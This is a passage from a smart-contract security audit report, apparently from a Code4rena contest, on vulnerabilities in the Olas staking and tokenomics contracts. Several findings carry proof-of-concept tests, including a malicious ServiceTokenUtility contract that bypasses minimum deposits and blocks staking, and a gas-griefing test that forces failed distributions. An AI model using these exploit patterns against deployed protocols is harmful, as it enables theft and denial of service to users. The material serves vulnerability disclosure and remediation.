  • Note that to run the test properly, two modifications are needed in the mock contracts.

The function sendMessage in the contract BridgeRelayer should be modified as follows.

    function sendMessage(
      address target,
      bytes calldata message,
      uint32 gasLimit
  ) external payable {
      sender = msg.sender;
      (bool success, ) = target.call{gas: gasLimit}(message);

      if (!success) {
          revert("");
      }
  }

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/test/BridgeRelayer.sol#L286

The function verifyInstanceAndGetEmissionsAmount in the contract MockStakingFactory should be modified as follows to emulate a case where the verification consumes high gas.

    function verifyInstanceAndGetEmissionsAmount(
      address instance
  ) external view returns (uint256 amount) {
      // This is to emulate the case that verification consumes 900_000 gas
      // If instance is zero, the if-clause does not execute. Instance zero is just to make the withheldAmount nonzero
      if (instance != address(0)) {
          uint gasUsedDuringVerification = 900_000;
          uint initialGas = gasleft();
          uint gasUsed;
          while (gasUsed < gasUsedDuringVerification) {
              gasUsed = initialGas - gasleft();
          }
      }

      // Verify the proxy instance
      bool success = verifyInstance(instance);

      if (success) {
          // Get the proxy instance emissions amount
          amount = 100 ether;
      }
  }

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/test/MockStakingFactory.sol#L39

        it("Attacker forces a distribution to be unsuccessful", async function () {
           // Encode the staking data to emulate it being received on L2
           const stakingTarget = stakingInstance.address;
           const stakingIncentive = defaultAmount;

           ///////////////// This section is done to have withheldAmount and stakingBatchNonce nonzero
           // This is not part of the attack; it just makes the scenario simpler and more realistic,
           // because changing their state when already nonzero is cheaper than going from zero to nonzero
           let bridgePayload = ethers.utils.defaultAbiCoder.encode(["uint256", "uint256"],
               [defaultCost, defaultGasLimit]);
           // Send a message on L2 with funds for a wrong address to change the withheld amount from zero to nonzero
           await dispenser.mintAndSend(optimismDepositProcessorL1.address, ethers.constants.AddressZero, stakingIncentive, bridgePayload,
               stakingIncentive, { value: defaultMsgValue });
           /////////////////////////////////////////////////////////////////////////////////


           console.log("withheldAmount before the attack: ", await optimismTargetDispenserL2.withheldAmount());
           console.log("nonce before the attack: ", await optimismTargetDispenserL2.stakingBatchNonce());

           ////////////// Attacker sets the gaslimit equal to 900_000
           bridgePayload = ethers.utils.defaultAbiCoder.encode(["uint256", "uint256"],
               [defaultCost, 900000]);

           await dispenser.mintAndSend(optimismDepositProcessorL1.address, stakingTarget, stakingIncentive, bridgePayload,
               stakingIncentive, { value: defaultMsgValue });


           console.log("withheldAmount after the attack: ", await optimismTargetDispenserL2.withheldAmount());
           console.log("nonce after the attack: ", await optimismTargetDispenserL2.stakingBatchNonce());
       });

The result is:

  StakingBridging
   Optimism
withheldAmount before the attack:  BigNumber { value: "100" }
nonce before the attack:  BigNumber { value: "1" }
withheldAmount after the attack:  BigNumber { value: "200" }
nonce after the attack:  BigNumber { value: "2" }
     ✓ Attacker forces a distribution to be unsuccessful

Tools Used

Recommended Mitigation Steps

It is recommended that, when the call to StakingFactory::verifyInstanceAndGetEmissionsAmount fails, the contract checks whether the forwarded gas was sufficient. If it was not, the transaction should revert so that the message can be retried on L2.

    function _processData(bytes memory data) internal {
        //....
        uint256 initialGas = gasleft();

        bytes memory verifyData = abi.encodeCall(IStakingFactory.verifyInstanceAndGetEmissionsAmount, target);
        (bool success, bytes memory returnData) = stakingFactory.call(verifyData);

        uint256 afterGas = gasleft();

        if (!success) {
            // If the callee ran out of gas, only about 1/64 of the gas available before the call remains here
            if (afterGas <= (initialGas / 64)) {
                revert("the provided gas was not enough");
            }
        }
        //....
    }

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/DefaultTargetDispenserL2.sol#L160

Assessed type

Context

WormholeDepositProcessorL1 never sends cross-chain messages and bridges tokens only to EVM chains

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/tokenomics/contracts/staking/WormholeDepositProcessorL1.sol#L96-L97

Vulnerability details

Relevant code: WormholeDepositProcessorL1::_sendMessage

Description

The deposit processors used for bridging on L1 work in two possible ways:

  • They can send tokens, or
  • They can send only a message to L2 (when there are enough withheld tokens)

Some examples are GnosisDepositProcessorL1::_sendMessage:

if (transferAmount > 0) {
	...
    bytes memory data = abi.encode(targets, stakingIncentives);
    IBridge(l1TokenRelayer).relayTokensAndCall(olas, l2TargetDispenser, transferAmount, data); 
    ...
} else {
	...
    bytes32 iMsg = IBridge(l1MessageRelayer).requireToPassMessage(l2TargetDispenser, data, gasLimitMessage);
    ...
}

ArbitrumDepositProcessorL1::_sendMessage:

if (transferAmount > 0) {
	...
    IBridge(l1TokenRelayer).outboundTransferCustomRefund{value: cost[0]}(olas, refundAccount,
        l2TargetDispenser, transferAmount, TOKEN_GAS_LIMIT, gasPriceBid, submissionCostData);
}
...
sequence = IBridge(l1MessageRelayer).createRetryableTicket{value: cost[1]}(l2TargetDispenser, 0,
    maxSubmissionCostMessage, refundAccount, refundAccount, gasLimitMessage, gasPriceBid, data);

The same is true for Optimism and Polygon processors as well.

The only deposit processor that is not implemented like this is WormholeDepositProcessorL1. This means that every time we might want to only send a message, the token bridging flow is triggered anyway, wasting additional resources on every call.

The other issue is that, according to the README, one of the chains Olas is going to be deployed to is Solana. WormholeDepositProcessorL1 is the only way to send messages/tokens to the Solana chain. Thus, it should use the corresponding transferTokens function when wormholeTargetChainId points to a non-EVM chain.

Root Cause

  1. Using token bridging when a simple cross-chain message is enough. The following function is always called:
sequence = sendTokenWithPayloadToEvm(uint16(wormholeTargetChainId), l2TargetDispenser, data, 0, gasLimitMessage, olas, transferAmount, uint16(l2TargetChainId), refundAccount);
  2. Always making an EVM-specific function call, even though it is possible that wormholeTargetChainId == 1 (Solana)

Impact

Users claiming fees for Staking contracts are forced to always use the token bridging flow and pay higher transaction fees than necessary. Over time, the overpaid fees will add up to a sizeable amount, especially considering the high dependency on cross-chain transactions.

WormholeDepositProcessorL1 also does not use the non-EVM bridging functions, even though it is planned to do so. This can cause loss of funds when distributing token incentives.

Suggested Mitigation

The l1MessageRelayer is able to send messages to EVM and non-EVM chains via sendPayloadToEvm and send respectively when transferAmount == 0.

Use transferTokens function call when bridging tokens to non-EVM chains.
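
As a hedged sketch only: the interfaces below are simplified local stand-ins (assumed shapes, not the exact Wormhole or Olas signatures), and the chain id, field names, and constructor wiring are illustrative. The point is the control flow: a plain payload when transferAmount == 0, transferTokens for a non-EVM target, and the existing token-with-payload path otherwise.

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

// Simplified local stand-ins for the relayer and token bridge used in this sketch
interface IRelayerSketch {
    function sendPayloadToEvm(uint16 targetChain, address target, bytes calldata payload,
        uint256 receiverValue, uint256 gasLimit) external payable returns (uint64);
}

interface ITokenBridgeSketch {
    function transferTokens(address token, uint256 amount, uint16 recipientChain,
        bytes32 recipient, uint256 arbiterFee, uint32 nonce) external payable returns (uint64);
}

contract WormholeSendSketch {
    uint16 public constant SOLANA_CHAIN_ID = 1;
    address public immutable olas;
    address public immutable l2TargetDispenser;
    bytes32 public immutable l2TargetDispenserNonEVM;
    IRelayerSketch public immutable relayer;
    ITokenBridgeSketch public immutable tokenBridge;

    constructor(address _olas, address _dispenser, bytes32 _dispenserNonEVM,
        IRelayerSketch _relayer, ITokenBridgeSketch _tokenBridge) {
        olas = _olas;
        l2TargetDispenser = _dispenser;
        l2TargetDispenserNonEVM = _dispenserNonEVM;
        relayer = _relayer;
        tokenBridge = _tokenBridge;
    }

    // Called from a payable entry point in practice
    function _sendMessage(uint16 targetChain, bytes memory data, uint256 transferAmount,
        uint256 gasLimit) internal returns (uint64 sequence) {
        if (transferAmount == 0) {
            // Message-only path: no need to touch the token bridge at all
            sequence = relayer.sendPayloadToEvm{value: msg.value}(
                targetChain, l2TargetDispenser, data, 0, gasLimit);
        } else if (targetChain == SOLANA_CHAIN_ID) {
            // Non-EVM path: bridge tokens with transferTokens instead of an EVM-only helper
            sequence = tokenBridge.transferTokens{value: msg.value}(
                olas, transferAmount, targetChain, l2TargetDispenserNonEVM, 0, 0);
        } else {
            // EVM path with tokens keeps using the existing token-with-payload helper (omitted)
        }
    }
}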

Assessed type

Other

StakingFactory performs incomplete checks of initialization data after creating a new staking instance

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingVerifier.sol#L179

Vulnerability details

Impact

The StakingBase contract initializes many important parameters. For example, parameters such as serviceRegistry and activityChecker are crucial to the entire system.
If these parameters are maliciously set but the contract still passes the StakingVerifier checks, the system may be impacted.

Proof of Concept

https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingVerifier.sol#L179

    function verifyInstance(address instance, address implementation) external view returns (bool) {
        // If the implementations check is true, and the implementation is not whitelisted, the verification is failed
        if (implementationsCheck && !mapImplementations[implementation]) {
            return false;
        }

        // Check that instance is the contract when it is not checked against the implementation
        if (instance.code.length == 0) {
            return false;
        }

        // Check for the staking parameters
        // This is a must have parameter for all staking contracts
        uint256 rewardsPerSecond = IStaking(instance).rewardsPerSecond();
        if (rewardsPerSecond > rewardsPerSecondLimit) {
            return false;
        }

        // Check for the number of services
        // This is a must have parameter for all staking contracts
        uint256 numServices = IStaking(instance).maxNumServices();
        if (numServices > numServicesLimit) {
            return false;
        }

        // Check staking token
        // This is an optional check since there could be staking contracts with native tokens
        bytes memory tokenData = abi.encodeCall(IStaking.stakingToken, ());
        (bool success, bytes memory returnData) = instance.staticcall(tokenData);

        // Check the returnData is the call was successful
        if (success) {
            // The returned size must be 32 to fit one address
            if (returnData.length == 32) {
                address token = abi.decode(returnData, (address));
                if (token != olas) {
                    return false;
                }
            } else {
                return false;
            }
        }

        return true;
    }

The verifyInstance function only checks rewardsPerSecond, maxNumServices, and the staking token, lacking checks for important parameters such as serviceRegistry and activityChecker.

Tools Used

Manual audit

Recommended Mitigation Steps

Check the initialization of important parameters such as serviceRegistry and activityChecker in the verifyInstance function.
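
A minimal sketch of such checks, assuming the instance exposes public serviceRegistry() and activityChecker() getters (as StakingBase does) and that the verifier is configured with the expected addresses; this is an illustration of the idea, not the project's implementation.

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

interface IStakingSketch {
    function serviceRegistry() external view returns (address);
    function activityChecker() external view returns (address);
}

// Hypothetical helper showing the extra checks that could be folded into
// StakingVerifier.verifyInstance()
contract VerifierSketch {
    address public immutable expectedServiceRegistry;
    address public immutable expectedActivityChecker;

    constructor(address _serviceRegistry, address _activityChecker) {
        expectedServiceRegistry = _serviceRegistry;
        expectedActivityChecker = _activityChecker;
    }

    function verifyCriticalAddresses(address instance) external view returns (bool) {
        // Reject instances initialized with an unexpected service registry
        if (IStakingSketch(instance).serviceRegistry() != expectedServiceRegistry) {
            return false;
        }
        // Reject instances initialized with an unexpected activity checker
        if (IStakingSketch(instance).activityChecker() != expectedActivityChecker) {
            return false;
        }
        return true;
    }
}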

Assessed type

Invalid Validation

Malicious StakingToken instance can DoS deposits and control min deposit amount

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingFactory.sol#L230-L233
https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingToken.sol#L54-L69
https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingToken.sol#L74-L98

Vulnerability details

Relevant code: StakingFactory::createStakingInstance, StakingToken::initialize, StakingToken::_checkTokenStakingDeposit

Description

A StakingToken contract can be created permissionlessly via the StakingFactory:

function createStakingInstance(
    address implementation,
    bytes memory initPayload
) external returns (address payable instance)

The first parameter is a whitelisted staking implementation and the second one encodes a function call to an initialize() function containing various parameters, one of which is serviceRegistryTokenUtility. This param is responsible for providing token info about services and the bond of each agent in a service:

// Get the service staking token and deposit
(address token, uint96 stakingDeposit) = IServiceTokenUtility(serviceRegistryTokenUtility).mapServiceIdTokenDeposit(serviceId);
...
for (uint256 i = 0; i < serviceAgentIds.length; ++i) {
    uint256 bond = IServiceTokenUtility(serviceRegistryTokenUtility).getAgentBond(serviceId, serviceAgentIds[i]);
    ...
}

While the validity of most parameters is checked in StakingFactory or StakingVerifier, serviceRegistryTokenUtility isn't. This means a malicious user can supply a custom implementation that alters the behavior of a StakingToken instance.

Root Cause

Lack of validation for the serviceRegistryTokenUtility address when creating StakingToken contracts.

This issue does not affect StakingNativeToken instances as they don't have such a parameter.

Impact

A malicious actor can permissionlessly create a StakingToken contract with an altered implementation of IServiceTokenUtility. There are a few implications coming out of this:

  • The malicious actor can set the service deposit or agent bond below the required minimum.
  • Service deposit token and StakingToken token can be different.
  • Honest protocol users can be DoSed from staking a service.

This issue is different from the one for distributing rewards to services with inactive multisigs because it relates only to StakingToken and is caused by modifying another parameter. Fixing one would not automatically fix the other.

PoC

The following PoC illustrates how the min service deposit condition can be tripped and how certain services can be denied staking.

Add the following file contracts/test/MaliciousServiceTokenUtility.sol:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

interface IServiceTokenUtility {
    function mapServiceIdTokenDeposit(uint256 serviceId) external view returns (address, uint96);
    function getAgentBond(uint256 serviceId, uint256 agentId) external view returns (uint256 bond);
}

contract MaliciousServiceTokenUtility is IServiceTokenUtility {
    IServiceTokenUtility original;
    address public owner;
    address public token;
    uint256 lowDepositServiceId; // privileged service id
    uint256 blockedServiceId;    // DoSed service id

    constructor(address _original, address _token) {
        original = IServiceTokenUtility(_original);
        token = _token;
        owner = msg.sender;
    }

    function setServiceIds(uint256 _lowDepositServiceId, uint256 _blockedServiceId) public {
        require(msg.sender == owner, "not owner");
        lowDepositServiceId = _lowDepositServiceId;
        blockedServiceId = _blockedServiceId;
    }

    function mapServiceIdTokenDeposit(uint256 serviceId) external view returns (address, uint96) {
        if (serviceId == lowDepositServiceId) {
            return (token, type(uint96).max);
        } else if (serviceId == blockedServiceId) {
            return (address(0x1111111111111111111111111111111111111111), 0);
        } else {
            return original.mapServiceIdTokenDeposit(serviceId);
        }
    }

    function getAgentBond(uint256 serviceId, uint256 agentId) external view returns (uint256 bond) {
        if (serviceId == lowDepositServiceId) {
            return type(uint96).max;
        } else if (serviceId == blockedServiceId) {
            return 0;
        } else {
            return original.getAgentBond(serviceId, agentId);
        }
    }
}

Then, add the test below in ServiceStaking.js:

context("StakingToken manipulation", function () {
    it("Should arbitrarily DoS services and allow deposit below minimum", async function() {
        const maliciousServiceUtilityFactory = await ethers.getContractFactory('MaliciousServiceTokenUtility');
        let maliciousServiceUtility = await maliciousServiceUtilityFactory.deploy(serviceRegistryTokenUtility.address, token.address);
        
        await maliciousServiceUtility.setServiceIds(
            1, // service 1 will be able to deposit below minimum
            2  // service 2 will be DoSed
        );

        serviceParams.minStakingDeposit = ethers.utils.parseEther("100"); // 100 ether minimum deposit

        const StakingToken = await ethers.getContractFactory("StakingToken");
        stakingTokenImplementation = await StakingToken.deploy();
        initPayload = stakingTokenImplementation.interface.encodeFunctionData("initialize",
            [serviceParams, maliciousServiceUtility.address, token.address]);
        const stakingTokenAddress = await stakingFactory.callStatic.createStakingInstance(
            stakingTokenImplementation.address, initPayload);
        await stakingFactory.createStakingInstance(stakingTokenImplementation.address, initPayload);
        stakingToken = await ethers.getContractAt("StakingToken", stakingTokenAddress);
        
        // Approve and deposit token to the staking contract
        await token.approve(stakingToken.address, initSupply);
        await stakingToken.deposit(ethers.utils.parseEther("1"));

        // Approve services
        await serviceRegistry.approve(stakingToken.address, serviceId);
        await serviceRegistry.approve(stakingToken.address, serviceId + 1);

        // Stake service 1, even though minimum service deposit is 100 ether
        await stakingToken.stake(serviceId);
        expect(await serviceRegistry.ownerOf(serviceId)).to.eq(stakingToken.address);
        
        // Can't stake service 2, because MaliciousServiceTokenUtility returns wrong token address
        await expect(
            stakingToken.stake(serviceId + 1)
        ).to.be.revertedWithCustomError(stakingToken, "WrongStakingToken");
    });
});

Suggested Mitigation

There is already a contract responsible for verifying the validity of the StakingToken contract instance - StakingVerifier. The verifyInstance function should be modified to check if the correct ServiceTokenUtility has been set, similarly to how the staking token is checked, because not all staking contracts will have such a field:

address serviceRegistryTokenUtility;
...
function verifyInstance(address instance, address implementation) external view returns (bool) {
	...
	bytes memory utilityData = abi.encodeCall(IStaking.serviceRegistryTokenUtility, ());
	(bool success, bytes memory returnData) = instance.staticcall(utilityData);

	if (success) {
	    // The returned value must match the expected ServiceRegistryTokenUtility address
	    if (returnData.length != 32 || abi.decode(returnData, (address)) != serviceRegistryTokenUtility) {
	        return false;
	    }
	}
	...
}

Assessed type

Invalid Validation

`StakingToken` may become insolvent when using a rebasing token

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingToken.sol#L108
https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingToken.sol#L125

Vulnerability details

The StakingToken contract allows the protocol to deposit and withdraw staking rewards in an arbitrary ERC20 token to be distributed to eligible services. This contract is meant to support rebasing tokens as per the README and confirmed by the sponsor.

However, the contract's accounting logic is not compatible with rebasing tokens. Using a rebasing token for staking rewards will lead to incorrect tracking of balances and potential insolvency.

Rebasing tokens dynamically adjust balances of token holders based on a target price or other mechanism. This means the actual token balance of the contract can change between transactions, without any tokens being transferred in or out.

The StakingToken contract does not account for this. It tracks deposits and withdrawals using the balance variable, which it assumes will only change when deposit() and _withdraw() are called.

If stakingToken is a rebasing token, its balance can change between the time deposit() is called and the next interaction with the contract. This will cause balance to no longer reflect the actual token balance.

Over time, balance and availableRewards will diverge further and further from the real balance, possibly leading to a situation where _withdraw() attempts to send out more tokens than the contract holds.

Impact

If a rebasing token is used for staking rewards, the contract's accounting will become increasingly inaccurate over time. Withdrawals will fail if the token rebases down and the contract tries to send out more tokens than it owns.

If the token only ever rebases up or sends airdrops, the additional balance in the contract will not be reflected in the balance variable and will be unavailable to be distributed.

Proof of Concept

  1. Protocol deposits 1000 stakingToken into the contract via deposit(). balance and availableRewards are incremented by 1000.
  2. stakingToken rebases, decreasing all balances by 10%. The contract now actually holds 900 tokens.
  3. Protocol attempts to withdraw 1000 stakingToken via _withdraw() to distribute as staking rewards.
  4. The withdrawal fails because the contract only holds 900 tokens, less than the 1000 amount that _withdraw() tries to send.
  5. The transaction reverts and staking rewards cannot be distributed, breaking core functionality of the contract.

Tools Used

Manual review

Recommended Mitigation Steps

Properly supporting rebasing tokens would require significant changes to the contract's accounting logic. Instead of tracking balances and amounts directly, the contract would need to use a "shares" system.

Deposits would mint shares proportional to the deposited amount and the contract's current balance. Withdrawals would burn shares and send out an amount based on the share proportion.
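
A minimal sketch of such a shares system is shown below. The ERC20 interface is an assumed local declaration, there is no reward or access-control logic, and the contract only illustrates how share-based accounting tolerates balance changes between transactions; it is not a drop-in replacement for StakingToken.

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

// Assumed, simplified ERC20 interface for this sketch
interface IERC20Sketch {
    function balanceOf(address account) external view returns (uint256);
    function transfer(address to, uint256 amount) external returns (bool);
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

contract RebasingShareSketch {
    IERC20Sketch public immutable stakingToken;
    uint256 public totalShares;
    mapping(address => uint256) public shares;

    constructor(IERC20Sketch _stakingToken) {
        stakingToken = _stakingToken;
    }

    // Deposits mint shares proportional to the contract's current token balance,
    // so later rebases change the value of a share rather than breaking accounting
    function deposit(uint256 amount) external {
        uint256 balanceBefore = stakingToken.balanceOf(address(this));
        uint256 newShares = (totalShares == 0 || balanceBefore == 0)
            ? amount
            : (amount * totalShares) / balanceBefore;
        require(stakingToken.transferFrom(msg.sender, address(this), amount), "transfer failed");
        shares[msg.sender] += newShares;
        totalShares += newShares;
    }

    // Withdrawals burn shares and pay out the proportional part of the current balance
    function withdraw(uint256 shareAmount) external {
        require(totalShares > 0, "no shares");
        uint256 amount = (shareAmount * stakingToken.balanceOf(address(this))) / totalShares;
        shares[msg.sender] -= shareAmount;
        totalShares -= shareAmount;
        require(stakingToken.transfer(msg.sender, amount), "transfer failed");
    }
}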

However, given the complexity of these changes and the limited benefit, it may be advisable to simply not support rebasing tokens and document this limitation.

Assessed type

ERC20

GnosisDepositProcessor will never transfer the exact amount of tokens

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/tokenomics/contracts/staking/GnosisDepositProcessorL1.sol#L63-L70

Vulnerability details

Relevant code: GnosisDepositProcessorL1::_sendMessage

Description

The GnosisDepositProcessorL1 is responsible for bridging token incentives distributed from the Dispenser to the Gnosis chain.

The bridging function call consists of the following parameters:

  • transferAmount - the total amount of tokens to transfer (for all target services)
  • targets - the addresses of the Staking contracts to receive funds
  • stakingIncentives - an array of uint256 values dictating how much each target service should receive

// Approve tokens for the bridge contract
IToken(olas).approve(l1TokenRelayer, transferAmount);

bytes memory data = abi.encode(targets, stakingIncentives);
IBridge(l1TokenRelayer).relayTokensAndCall(olas, l2TargetDispenser, transferAmount, data);

The issue is that the OmniBridge, used to send the tokens, takes a fee from the amount of tokens sent:

address nativeToken = nativeTokenAddress(_token);
uint256 fee = _distributeFee(HOME_TO_FOREIGN_FEE, nativeToken == address(0), _from, _token, _value);
uint256 valueToBridge = _value.sub(fee);

bytes memory data = _prepareMessage(nativeToken, _token, _receiver, valueToBridge, _data);

This means that when GnosisTargetDispenserL2 receives the message and tries to distribute the token incentives, the last deposit will not occur:

function _processData(bytes memory data) internal {
	...
	// Decode received data
	(address[] memory targets, uint256[] memory amounts) = abi.decode(data, (address[], uint256[]));
	for (uint256 i = 0; i < targets.length; ++i) {
	    address target = targets[i];
	    uint256 amount = amounts[i];
	    ...
	    // Check the OLAS balance and the contract being unpaused
	    if (IToken(olas).balanceOf(address(this)) >= amount && localPaused == 1) {
	        // Approve and transfer OLAS to the service staking target
	        IToken(olas).approve(target, amount);
	        IStaking(target).deposit(amount);
	        emit StakingTargetDeposited(target, amount);
	    } else {
	        // Hash of target + amount + batchNonce
	        bytes32 queueHash = keccak256(abi.encode(target, amount, batchNonce));
	        // Queue the hash for further redeem
	        stakingQueueingNonces[queueHash] = true;
	        emit StakingRequestQueued(queueHash, target, amount, batchNonce, localPaused);
	    }
	}
}

Root Cause

OmniBridge fees are unaccounted for. The contract assumes that all tokens will arrive on the target chain.

Impact

Staking contracts on Gnosis will not be able to automatically receive the token incentives. Every time tokens are bridged, one Staking contract will not get an automatic deposit. This increases the friction of using the protocol and prevents service owners from getting their rewards on time.

PoC

Suppose someone calls Dispenser::claimStakingIncentives for a staking target located on the Gnosis chain.

It is calculated that 100 OLAS should be sent to the Staking contract.

When sending the message to GnosisDepositProcessorL1 the following values will be in place:

  • transferAmount = 100 OLAS
  • targets = [staking contract address] (array of 1 address)
  • stakingIncentives = [100e18] - amount to send to staking contract

As the tokens are bridged, a fee is deducted from transferAmount, so only, say, 99.5 OLAS arrives. The exact fee amount does not matter.

When the bridging callback is invoked in GnosisTargetDispenserL2 on Gnosis, this balance check will be false (assuming the contract is empty):

if (IToken(olas).balanceOf(address(this)) >= amount && localPaused == 1)

This means the tokens are not transferred. Instead, the Staking contract incentive has to be manually claimed by calling redeem on GnosisTargetDispenserL2.

If Dispenser::claimStakingIncentivesBatch is called on a batch of Staking targets, the last one will not receive its deposit automatically.

Suggested Mitigation

A possible solution would be to take into account the token fee when distributing incentives from Dispenser. This means that the IDepositProcessor interface would have to be modified to include a function like function tokenFee(uint256) external returns (uint256);

Then, _distributeStakingIncentives would look like:

...
// Transfer corresponding OLAS amounts to the deposit processor
if (transferAmount > 0) {
	transferAmount += IDepositProcessor(depositProcessor).tokenFee(transferAmount);
	IToken(olas).transfer(depositProcessor, transferAmount);
}
...

Assessed type

Other

StakingToken.sol doesn't properly handle fee-on-transfer tokens, rebasing tokens, or those with variable balances, which will lead to accounting issues downstream

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingToken.sol#L125
https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingToken.sol#L108

Vulnerability details

Impact

The protocol aims to work with all sorts of ERC20 tokens, including tokens that charge a fee on transfer, such as PAXG. Deposits and withdrawals of these tokens, when used as staking tokens in StakingToken.sol, are not properly handled, which causes a number of accounting issues, most notably passing the fee losses on to the last unstaker or reward claimer. The same effect, though to a lesser degree, can be observed with tokens like stETH, which has the 1 wei corner case where the amount transferred can be slightly less than the amount passed in. Other rebasing tokens and tokens with variable balances or airdrops are affected too: a negative rebase has the same effect as a transfer fee, leaving the actual token balance below what the internal accounting suggests, while extra tokens from positive rebases or airdrops are lost because they do not match the internal accounting and there is no other way to claim them.

Proof of Concept

From the README:

ERC20 token behaviors in scope:
  • Fee on transfer: Yes
  • Balance changes outside of transfers: Yes

Looking at StakingToken.sol, we can see that the stakingToken amount is transferred as-is and recorded into the contract's balance and availableRewards. If stakingToken is a token like PAXG that charges a fee on transfer, the amount transferred from msg.sender upon deposit will differ from the amount received by StakingToken.sol and recorded in balance/availableRewards, creating a mismatch between the contract's accounting and its actual token balance.

    function deposit(uint256 amount) external {
        // Add to the contract and available rewards balances
        uint256 newBalance = balance + amount;
        uint256 newAvailableRewards = availableRewards + amount;

        // Record the new actual balance and available rewards
        balance = newBalance;
        availableRewards = newAvailableRewards;

        // Add to the overall balance
        SafeTransferLib.safeTransferFrom(stakingToken, msg.sender, address(this), amount);

        emit Deposit(msg.sender, amount, newBalance, newAvailableRewards);
    }

The same can be seen in _withdraw, which is called when a user claims or unstakes. The amount the user receives will be less than they expect, while the wrong amount is emitted in the event.

    function _withdraw(address to, uint256 amount) internal override {
        // Update the contract balance
        balance -= amount;

        SafeTransferLib.safeTransfer(stakingToken, to, amount);

        emit Withdraw(to, amount);
    }

The ultimate effect will be seen during user claims and unstakes: a point will be reached where the stakingToken balance in the contract is zero while the internal accounting still registers rewards available for users to claim. To rescue the situation, the protocol would incur extra costs sending tokens to the StakingToken contract address to momentarily reconcile the token balance with the internal tracking. The same effect can be observed with rebasing tokens when they rebase negatively, or with the 1 wei corner case, since the actual available balance is less than the accounting balance. Funds will also be lost if the contract receives airdrops of the stakingToken or it rebases positively.

Tools Used

Manual code review

Recommended Mitigation Steps

Query the token balance before and after transfers, or disable support for these token types.
A skim function can also be introduced to recover any excess tokens from positive rebases.
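
A minimal sketch of the balance-before/after pattern is shown below, with an assumed ERC20 interface and simplified state; the point is that only the amount actually received is credited to balance and availableRewards.

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

// Assumed, simplified ERC20 interface for this sketch
interface IERC20Sketch {
    function balanceOf(address account) external view returns (uint256);
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

contract FeeOnTransferDepositSketch {
    IERC20Sketch public immutable stakingToken;
    uint256 public balance;
    uint256 public availableRewards;

    event Deposit(address indexed sender, uint256 received, uint256 balance, uint256 availableRewards);

    constructor(IERC20Sketch _stakingToken) {
        stakingToken = _stakingToken;
    }

    function deposit(uint256 amount) external {
        // Measure what actually arrived rather than trusting `amount`
        uint256 before = stakingToken.balanceOf(address(this));
        require(stakingToken.transferFrom(msg.sender, address(this), amount), "transfer failed");
        uint256 received = stakingToken.balanceOf(address(this)) - before;

        // Credit only the received amount so accounting matches the real token balance
        balance += received;
        availableRewards += received;
        emit Deposit(msg.sender, received, balance, availableRewards);
    }
}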

Assessed type

Token-Transfer

QA Report

See the markdown file with the details of this report here.

Owner changes may not be applied if the year changes in the middle of the epoch

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/tokenomics/contracts/Tokenomics.sol#L743
https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/tokenomics/contracts/Tokenomics.sol#L1143
https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/tokenomics/contracts/Tokenomics.sol#L1174
https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/tokenomics/contracts/Tokenomics.sol#L1194

Vulnerability details

Vulnerability Detail

If the owner of the Tokenomics contract wants to update some parameters for a future epoch, the owner notifies the contract by setting specific bits. Let's look at how this is done in changeIncentivesFractions. After all necessary changes, the following logic is executed.

tokenomicsParametersUpdated = tokenomicsParametersUpdated | 0x02;

Now consider the checkpoint function. If the year changes in the middle of the epoch, the epoch inflation numbers must be adjusted to account for the year change, and when that adjustment is made, the following logic is executed.

tokenomicsParametersUpdated = tokenomicsParametersUpdated | 0x04

The problem is that during the inflation adjustment, tokenomicsParametersUpdated is set to 0x04, which can interfere with the update the owner originally intended. If the owner set tokenomicsParametersUpdated to specific bits before the checkpoint, those bits are checked in the checkpoint function and the corresponding logic is executed.

For example:

if (tokenomicsParametersUpdated & 0x01 == 0x01) { //@audit 
      curEpochLen = nextEpochLen;
      epochLen = uint32(curEpochLen);
      nextEpochLen = 0;
   if (nextVeOLASThreshold > 0) {
          veOLASThreshold = nextVeOLASThreshold;
          nextVeOLASThreshold = 0;
      }
}

The same applies with different bits:

if (tokenomicsParametersUpdated & 0x02 == 0x02) ...

if (tokenomicsParametersUpdated & 0x08 == 0x08) ...

Proof of Concept

  1. The owner wants to change tokenomics parameters for the next epoch. They call the changeTokenomicsParameters function, and tokenomicsParametersUpdated is set to 0x01.

  2. checkpoint is called. The year changes in the middle of the epoch, so the adjustment happens and 0x04 is written to tokenomicsParametersUpdated.

  3. Moving forward, when the following check should apply, it is skipped because tokenomicsParametersUpdated is no longer equal to 0x01:

